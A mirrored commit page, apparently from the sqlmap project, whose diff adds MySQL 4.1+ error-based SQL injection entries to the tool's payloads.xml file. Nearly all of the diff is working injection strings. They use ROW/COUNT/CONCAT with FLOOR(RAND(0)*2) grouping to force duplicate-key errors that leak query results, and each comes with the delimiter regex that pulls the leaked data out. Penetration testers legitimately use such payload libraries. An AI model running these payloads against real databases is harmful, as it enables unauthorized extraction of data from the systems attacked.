Thanks to visit codestin.com
Credit goes to github.com

Skip to content

Commit 171a4c3

Browse files
stamparmstamparm
committed
added MySQL >=4.1 <=5.0 error based WHERE/HAVING payload
1 parent fb23bee commit 171a4c3

1 file changed

Lines changed: 41 additions & 1 deletion

File tree

xml/payloads.xml

Lines changed: 41 additions & 1 deletion
Original file line numberDiff line numberDiff line change
@@ -1009,6 +1009,26 @@ Formats:
10091009
</details>
10101010
</test>
10111011

1012+
<test>
1013+
<title>MySQL &gt;= 4.1 AND error-based - WHERE or HAVING clause</title>
1014+
<stype>2</stype>
1015+
<level>2</level>
1016+
<risk>0</risk>
1017+
<clause>1</clause>
1018+
<where>1</where>
1019+
<vector>AND ROW([RANDNUM],[RANDNUM1])>(SELECT COUNT(*),CONCAT('[DELIMITER_START]',([QUERY]),'[DELIMITER_STOP]',FLOOR(RAND(0)*2))x FROM (SELECT [RANDNUM] UNION SELECT [RANDNUM1])a GROUP BY x LIMIT 1)</vector>
1020+
<request>
1021+
<payload>AND ROW([RANDNUM],[RANDNUM1])>(SELECT COUNT(*),CONCAT('[DELIMITER_START]',(SELECT (CASE WHEN ([RANDNUM]=[RANDNUM]) THEN 1 ELSE 0 END)),'[DELIMITER_STOP]',FLOOR(RAND(0)*2))x FROM (SELECT [RANDNUM] UNION SELECT [RANDNUM1])a GROUP BY x LIMIT 1)</payload>
1022+
</request>
1023+
<response>
1024+
<grep>[DELIMITER_START](?P&lt;result&gt;.*?)[DELIMITER_STOP]</grep>
1025+
</response>
1026+
<details>
1027+
<dbms>MySQL</dbms>
1028+
<dbms_version>&gt;= 4.1</dbms_version>
1029+
</details>
1030+
</test>
1031+
10121032
<test>
10131033
<title>PostgreSQL AND error-based - WHERE or HAVING clause</title>
10141034
<stype>2</stype>
@@ -1168,12 +1188,32 @@ Formats:
11681188
</test>
11691189

11701190
<test>
1171-
<title>MySQL OR error-based - WHERE or HAVING clause</title>
1191+
<title>MySQL &gt;= 4.1 OR error-based - WHERE or HAVING clause</title>
11721192
<stype>2</stype>
11731193
<level>2</level>
11741194
<risk>0</risk>
11751195
<clause>1</clause>
11761196
<where>2</where>
1197+
<vector>OR ROW([RANDNUM],[RANDNUM1])>(SELECT COUNT(*),CONCAT('[DELIMITER_START]',([QUERY]),'[DELIMITER_STOP]',FLOOR(RAND(0)*2))x FROM (SELECT [RANDNUM] UNION SELECT [RANDNUM1])a GROUP BY x LIMIT 1)</vector>
1198+
<request>
1199+
<payload>OR ROW([RANDNUM],[RANDNUM1])>(SELECT COUNT(*),CONCAT('[DELIMITER_START]',(SELECT (CASE WHEN ([RANDNUM]=[RANDNUM]) THEN 1 ELSE 0 END)),'[DELIMITER_STOP]',FLOOR(RAND(0)*2))x FROM (SELECT [RANDNUM] UNION SELECT [RANDNUM1])a GROUP BY x LIMIT 1)</payload>
1200+
</request>
1201+
<response>
1202+
<grep>[DELIMITER_START](?P&lt;result&gt;.*?)[DELIMITER_STOP]</grep>
1203+
</response>
1204+
<details>
1205+
<dbms>MySQL</dbms>
1206+
<dbms_version>&gt;= 4.1</dbms_version>
1207+
</details>
1208+
</test>
1209+
1210+
<test>
1211+
<title>MySQL OR error-based - WHERE or HAVING clause</title>
1212+
<stype>2</stype>
1213+
<level>3</level>
1214+
<risk>0</risk>
1215+
<clause>1</clause>
1216+
<where>2</where>
11771217
<vector>OR 1 GROUP BY CONCAT('[DELIMITER_START]',([QUERY]),'[DELIMITER_STOP]',FLOOR(RAND(0)*2)) HAVING MIN(0)</vector>
11781218
<request>
11791219
<payload>OR 1 GROUP BY CONCAT('[DELIMITER_START]',(SELECT (CASE WHEN ([RANDNUM]=[RANDNUM]) THEN 1 ELSE 0 END)),'[DELIMITER_STOP]',FLOOR(RAND(0)*2)) HAVING MIN(0)</payload>

0 commit comments

Comments
 (0)